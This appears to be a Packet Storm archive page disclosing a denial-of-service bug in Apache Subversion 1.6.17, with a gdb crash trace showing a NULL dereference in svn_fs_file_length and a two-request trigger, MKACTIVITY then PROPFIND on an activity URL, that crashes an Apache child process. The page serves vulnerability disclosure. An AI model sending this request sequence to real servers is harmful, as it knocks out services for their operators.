exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Subversion 1.6.17 Denial Of Service

Subversion 1.6.17 Denial Of Service
Posted Mar 6, 2013
Authored by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b

Apache Subversion version 1.6.17 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | e9b34e60031efbc5447532dbe3d1f98c7abe97c43a721a45f4c089ca2632b2e5

Subversion 1.6.17 Denial Of Service

Change Mirror Download
#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and few others

(gdb) where
#0 0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1 0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2 0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3 0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4 0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5 0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6 0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7 0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8 0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax 0x7fff6e97e1e0 140735048835552
rbx 0x7fff6e97e1a8 140735048835496
rcx 0x7f2590df7028 139799321079848
rdx 0x0 0
rsi 0x0 0
rdi 0x7fff6e97dec8 140735048834760
rbp 0x3 0x3
rsp 0x7fff6e97de78 0x7fff6e97de78
r8 0x7f2596833ee0 139799415701216
r9 0x1 1
r10 0x1 1
r11 0x1 1
r12 0x4e24 20004
r13 0x7f2590e08028 139799321149480
r14 0x7fff6e97dff0 140735048835056
r15 0x7f2590df7028 139799321079848
rip 0x7f2595db9d60 0x7f2595db9d60 <svn_fs_file_length>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov 0x30(%rsi),%rax
(gdb) x/x $rsi
0x0: Cannot access memory at address 0x0


Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs).
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close